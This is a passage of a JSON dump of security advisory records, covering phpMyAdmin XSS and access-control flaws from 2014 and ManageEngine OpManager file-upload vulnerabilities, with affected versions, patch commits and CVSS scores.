rich text editors like RadEditor to see if he can find similar problems.\n\n\u201cMost of the company\u2019s user base is likely unaware that they silently integrated a high-risk vulnerability into their site,\u201d McNamara says of bug in closing, \u201cSystem owners signed off on this without knowing.\u201d\n", "modified": "2014-10-01T19:22:03", "published": "2014-09-29T12:15:03", "id": "THREATPOST:DDF98CD337434196370FDCA7D39C0ED0", "href": "https://threatpost.com/radeditor-web-editor-vulnerable-to-xss-attacks/108594/", "type": "threatpost", "title": "Web Editor Vulnerable To XSS Attacks", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "phpmyadmin": [{"lastseen": "2021-07-28T14:34:08", "description": "## PMASA-2014-10\n\n**Announcement-ID:** PMASA-2014-10\n\n**Date:** 2014-09-13\n\n### Summary\n\nXSRF/CSRF due to DOM based XSS in the micro history feature\n\n### Description\n\nBy deceiving a logged-in user to click on a crafted URL, it is possible to perform remote code execution and in some cases, create a root account due to a DOM based XSS vulnerability in the micro history feature.\n\n### Severity\n\nWe consider this vulnerability to be critical.\n\n### Affected Versions\n\nVersions 4.0.x (prior to 4.0.10.3), 4.1.x (prior to 4.1.14.4) and 4.2.x (prior to 4.2.8.1) are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 4.0.10.3 or newer, or 4.1.14.4 or newer, or 4.2.8.1 or newer, or apply the patches listed below.\n\n### References\n\nThanks to Olivier Beg (<http://www.olivierbeg.nl>) for reporting the vulnerability.\n\nAssigned CVE ids: [CVE-2014-6300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6300>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-352](<https://cwe.mitre.org/data/definitions/352.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [33b39f9f1dd9a4d27856530e5ac004e23b30e8ac](<https://github.com/phpmyadmin/phpmyadmin/commit/33b39f9f1dd9a4d27856530e5ac004e23b30e8ac>)\n\nThe following commits have been made on the 4.0 branch to fix this issue:\n\n * [ab0dba4533f1d01dde43c1864413478c921cfe6b](<https://github.com/phpmyadmin/phpmyadmin/commit/ab0dba4533f1d01dde43c1864413478c921cfe6b>)\n\nThe following commits have been made on the 4.1 branch to fix this issue:\n\n * [621772aa0d19d5f3ac21af2611c1dbda9b356506](<https://github.com/phpmyadmin/phpmyadmin/commit/621772aa0d19d5f3ac21af2611c1dbda9b356506>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "cvss3": {}, "published": "2014-09-13T00:00:00", "type": "phpmyadmin", "title": "XSRF/CSRF due to DOM based XSS in the micro history feature", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-09-13T00:00:00", "id": "PHPMYADMIN:PMASA-2014-10", "href": "https://www.phpmyadmin.net/security/PMASA-2014-10/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-28T14:34:08", "description": "## PMASA-2014-11\n\n**Announcement-ID:** PMASA-2014-11\n\n**Date:** 2014-10-01\n\n### Summary\n\nXSS vulnerabilities in table search and table structure pages.\n\n### Description\n\nWith a crafted ENUM value it is possible to trigger an XSS in table search and table structure pages.\n\n### Severity\n\nWe consider this vulnerability to be non critical.\n\n### Mitigation factor\n\nThis vulnerability can be triggered only by someone who is logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required pages.\n\n### Affected Versions\n\nVersions 4.0.x (prior to 4.0.10.4), 4.1.x (prior to 4.1.14.5) and 4.2.x (prior to 4.2.9.1) are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 4.0.10.4 or newer, or 4.1.14.5 or newer, or 4.2.9.1 or newer, or apply the patch listed below.\n\n### References\n\nThanks to Ashutosh Dhundhara for reporting this vulnerability.\n\nAssigned CVE ids: [CVE-2014-7217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7217>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [c1a3f85fbd1a9569646e7cf1b791325ae82c7961](<https://github.com/phpmyadmin/phpmyadmin/commit/c1a3f85fbd1a9569646e7cf1b791325ae82c7961>)\n * [304fb2b645b36a39e03b954fdbd567173ebe6448](<https://github.com/phpmyadmin/phpmyadmin/commit/304fb2b645b36a39e03b954fdbd567173ebe6448>)\n\nThe following commits have been made on the 4.0 branch to fix this issue:\n\n * [c6c77589a5860f20b5fb335033389de50e1a9031](<https://github.com/phpmyadmin/phpmyadmin/commit/c6c77589a5860f20b5fb335033389de50e1a9031>)\n\nThe following commits have been made on the 4.1 branch to fix this issue:\n\n * [71ccbbc423bcfd14ba40174b3adcd9a0fafaa511](<https://github.com/phpmyadmin/phpmyadmin/commit/71ccbbc423bcfd14ba40174b3adcd9a0fafaa511>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "phpmyadmin", "title": "XSS vulnerabilities in table search and table structure pages.", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-01T00:00:00", "id": "PHPMYADMIN:PMASA-2014-11", "href": "https://www.phpmyadmin.net/security/PMASA-2014-11/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-07-28T14:34:04", "description": "## PMASA-2014-7\n\n**Announcement-ID:** PMASA-2014-7\n\n**Date:** 2014-07-17\n\n### Summary\n\nAccess for an unprivileged user to MySQL user list.\n\n### Description\n\nAn unpriviledged user could view the MySQL user list and manipulate the tabs displayed in phpMyAdmin for them.\n\n### Severity\n\nWe consider this vulnerability to be non critical.\n\n### Mitigation factor\n\nThis vulnerability can be triggered only by someone who is logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required pages. Moreover, the configuration storage must be set up for the user groups feature.\n\n### Affected Versions\n\nVersions 4.1.x (prior to 4.1.14.2) and 4.2.x (prior to 4.2.6) are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 4.1.14.2 or newer, or 4.2.6 or newer, or apply the patch listed below.\n\n### References\n\nThanks to Chirayu Chiripal for reporting this vulnerability.\n\nAssigned CVE ids: [CVE-2014-4987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4987>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [395265e9937beb21134626c01a21f44b28e712e5](<https://github.com/phpmyadmin/phpmyadmin/commit/395265e9937beb21134626c01a21f44b28e712e5>)\n\nThe following commits have been made on the 4.1 branch to fix this issue:\n\n * [45550b8cff06ad128129020762f9b53d125a6934](<https://github.com/phpmyadmin/phpmyadmin/commit/45550b8cff06ad128129020762f9b53d125a6934>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "cvss3": {}, "published": "2014-07-17T00:00:00", "type": "phpmyadmin", "title": "Access for an unprivileged user to MySQL user list.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4987"], "modified": "2014-07-17T00:00:00", "id": "PHPMYADMIN:PMASA-2014-7", "href": "https://www.phpmyadmin.net/security/PMASA-2014-7/", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:33:58", "description": "## PMASA-2014-6\n\n**Announcement-ID:** PMASA-2014-6\n\n**Date:** 2014-07-17\n\n### Summary\n\nMultiple XSS in AJAX confirmation messages.\n\n### Description\n\nWith a crafted column name it is possible to trigger an XSS when dropping the column in table structure page. With a crafted table name it is possible to trigger an XSS when dropping or truncating the table in table operations page.\n\n### Severity\n\nWe consider this vulnerability to be non critical.\n\n### Mitigation factor\n\nThis vulnerability can be triggered only by someone who is logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required pages.\n\n### Affected Versions\n\nVersions 4.0.x (prior to 4.0.10.1), 4.1.x (prior to 4.1.14.2) and 4.2.x (prior to 4.2.6) are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 4.0.10.1 or newer, or 4.1.14.2 or newer, or 4.2.6 or newer, or apply the patch listed below.\n\n### References\n\nAssigned CVE ids: [CVE-2014-4986](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4986>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [29a1f56495a7d1d98da31a614f23c0819a606a4d](<https://github.com/phpmyadmin/phpmyadmin/commit/29a1f56495a7d1d98da31a614f23c0819a606a4d>)\n\nThe following commits have been made on the 4.0 branch to fix this issue:\n\n * [a92753bd65e1f8b72c46ed3dda6c362628e0daf7](<https://github.com/phpmyadmin/phpmyadmin/commit/a92753bd65e1f8b72c46ed3dda6c362628e0daf7>)\n\nThe following commits have been made on the 4.1 branch to fix this issue:\n\n * [cd5697027a2ee7e1f7d7000b23be6051cdb0516c](<https://github.com/phpmyadmin/phpmyadmin/commit/cd5697027a2ee7e1f7d7000b23be6051cdb0516c>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "cvss3": {}, "published": "2014-07-17T00:00:00", "type": "phpmyadmin", "title": "Multiple XSS in AJAX confirmation messages.", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4986"], "modified": "2014-07-17T00:00:00", "id": "PHPMYADMIN:PMASA-2014-6", "href": "https://www.phpmyadmin.net/security/PMASA-2014-6/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-07-28T14:34:06", "description": "## PMASA-2014-3\n\n**Announcement-ID:** PMASA-2014-3\n\n**Date:** 2014-06-20\n\n### Summary\n\nSelf-XSS due to unescaped HTML output in navigation items hiding feature.\n\n### Description\n\nWhen hiding or unhiding a crafted table name in the navigation, it is possible to trigger an XSS.\n\n### Severity\n\nWe consider this vulnerability to be non critical.\n\n### Mitigation factor\n\nThis vulnerability can be triggered only by someone who is logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required form.\n\n### Affected Versions\n\nVersions 4.1.x (prior to 4.1.14.1) and 4.2.x (prior to 4.2.4) are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 4.1.14.1 or newer, or 4.2.4 or newer, or apply the patch listed below.\n\n### References\n\nThanks to Chirayu Chiripal for reporting this vulnerability.\n\nAssigned CVE ids: [CVE-2014-4349](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4349>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [d4f754c937f9e2c0beadff5b2e38215dde1d6a79](<https://github.com/phpmyadmin/phpmyadmin/commit/d4f754c937f9e2c0beadff5b2e38215dde1d6a79>)\n\nThe following commits have been made on the 4.1 branch to fix this issue:\n\n * [daa98d0c7ed24b529dc5df0d5905873acd0b00be](<https://github.com/phpmyadmin/phpmyadmin/commit/daa98d0c7ed24b529dc5df0d5905873acd0b00be>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "cvss3": {}, "published": "2014-06-20T00:00:00", "type": "phpmyadmin", "title": "Self-XSS due to unescaped HTML output in navigation items hiding feature.", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4349"], "modified": "2014-06-20T00:00:00", "id": "PHPMYADMIN:PMASA-2014-3", "href": "https://www.phpmyadmin.net/security/PMASA-2014-3/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "debiancve": [{"lastseen": "2022-07-09T17:35:19", "description": "Cross-site scripting (XSS) vulnerability in the micro history implementation in phpMyAdmin 4.0.x before 4.0.10.3, 4.1.x before 4.1.14.4, and 4.2.x before 4.2.8.1 allows remote attackers to inject arbitrary web script or HTML, and consequently conduct a cross-site request forgery (CSRF) attack to create a root account, via a crafted URL, related to js/ajax.js.", "cvss3": {}, "published": "2014-11-08T11:55:00", "type": "debiancve", "title": "CVE-2014-6300", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-11-08T11:55:00", "id": "DEBIANCVE:CVE-2014-6300", "href": "https://security-tracker.debian.org/tracker/CVE-2014-6300", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-09T17:35:19", "description": "Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.0.x before 4.0.10.4, 4.1.x before 4.1.14.5, and 4.2.x before 4.2.9.1 allow remote authenticated users to inject arbitrary web script or HTML via a crafted ENUM value that is improperly handled during rendering of the (1) table search or (2) table structure page, related to libraries/TableSearch.class.php and libraries/Util.class.php.", "cvss3": {}, "published": "2014-10-03T01:55:00", "type": "debiancve", "title": "CVE-2014-7217", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-03T01:55:00", "id": "DEBIANCVE:CVE-2014-7217", "href": "https://security-tracker.debian.org/tracker/CVE-2014-7217", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-07-09T17:35:19", "description": "server_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x before 4.2.6 allows remote authenticated users to bypass intended access restrictions and read the MySQL user list via a viewUsers request.", "cvss3": {}, "published": "2014-07-20T11:12:00", "type": "debiancve", "title": "CVE-2014-4987", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4987"], "modified": "2014-07-20T11:12:00", "id": "DEBIANCVE:CVE-2014-4987", "href": "https://security-tracker.debian.org/tracker/CVE-2014-4987", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-07-09T17:35:19", "description": "Multiple cross-site scripting (XSS) vulnerabilities in js/functions.js in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allow remote authenticated users to inject arbitrary web script or HTML via a crafted (1) table name or (2) column name that is improperly handled during construction of an AJAX confirmation message.", "cvss3": {}, "published": "2014-07-20T11:12:00", "type": "debiancve", "title": "CVE-2014-4986", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4986"], "modified": "2014-07-20T11:12:00", "id": "DEBIANCVE:CVE-2014-4986", "href": "https://security-tracker.debian.org/tracker/CVE-2014-4986", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-07-09T17:35:19", "description": "Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.1.x before 4.1.14.1 and 4.2.x before 4.2.4 allow remote authenticated users to inject arbitrary web script or HTML via a crafted table name that is improperly handled after a (1) hide or (2) unhide action.", "cvss3": {}, "published": "2014-06-25T11:19:00", "type": "debiancve", "title": "CVE-2014-4349", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4349"], "modified": "2014-06-25T11:19:00", "id": "DEBIANCVE:CVE-2014-4349", "href": "https://security-tracker.debian.org/tracker/CVE-2014-4349", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "typo3": [{"lastseen": "2016-09-28T15:30:19", "description": "It has been discovered that the extension \"phpMyAdmin\" (phpmyadmin) is susceptible to Cross-Site Scripting.\n\n**Release Date:** November 5, 2014\n\n**Component Type:** Third party extension. This extension is not a part of the TYPO3 default installation.\n\n**Affected Versions:** 4.18.0, 4.18.1, 4.18.2 and 4.18.3\n\n**Vulnerability Type:** XSS\n\n**Severity:** Low\n\n**Suggested CVSS v2.0:** AV:N/AC:H/Au:S/C:P/I:P/A:N/E:ND/RL:O/RC:C\n\n**References:** [PMASA-2014-11](<http://www.phpmyadmin.net/home_page/security/PMASA-2014-11.php>)\n\n**Related CVE:** CVE-2014-7217\n\n**Problem Description:** Crafted database content can trigger XSS in table search and table structure pages.\n\n**Solution:** An updated version 4.18.4 is available from the TYPO3 extension manager and at <http://typo3.org/extensions/repository/download/phpmyadmin/4.18.4/t3x/>. Users of the extension are advised to update the extension as soon as possible.\n\n**Credits:** The vendor of the phpMyAdmin upstream software credits Ashutosh Dhundhara. Thanks to Andreas Beutel for providing a TYPO3 extension package with an updated phpMyAdmin version.\n\n**General advice:** Follow the recommendations that are given in the [TYPO3 Security Guide](<http://docs.typo3.org/typo3cms/SecurityGuide/> \"Initiates file download\" ). Please subscribe to the [typo3-announce mailing list](<http://lists.typo3.org/cgi-bin/mailman/listinfo/typo3-announce> \"Opens external link in new window\" ) to receive future Security Bulletins via E-mail.\n", "cvss3": {}, "published": "2014-11-05T00:00:00", "type": "typo3", "title": "Cross-Site Scripting vulnerability in extension phpMyAdmin (phpmyadmin)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2014-11-05T00:00:00", "id": "TYPO3-EXT-SA-2014-016", "href": "https://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-ext-sa-2014-016/", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "zdi": [{"lastseen": "2022-01-31T21:14:33", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the FileCollector servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager FileCollector FILENAME File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6034"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-143", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-143/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-31T21:14:59", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the MultipartRequestServlet servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-03T00:00:00", "type": "zdi", "title": "ManageEngine OpManager MultipartRequestServlet filename File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6036"], "modified": "2015-04-03T00:00:00", "id": "ZDI-15-113", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-113/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:34", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the AgentDataHandler class. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager AgentDataHandler FILENAME File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-142", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-142/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in ManageEngine OpManager FileCollector servlet regionID parameter\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "ManageEngine OpManager FileCollector Servlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6034"], "modified": "2014-11-30T00:00:00", "id": "E-410", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in ManageEngine OpManager FileCollector servlet FILENAME parameter\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "ManageEngine OpManager FileCollector Servlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-11-30T00:00:00", "id": "E-407", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:55:41", "description": "A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation on parameters sent to \"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\" in HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations.", "cvss3": {}, "published": "2014-10-12T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products FileCollector doPost Directory Traversal (CVE-2014-6034)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6034"], "modified": "2015-11-03T00:00:00", "id": 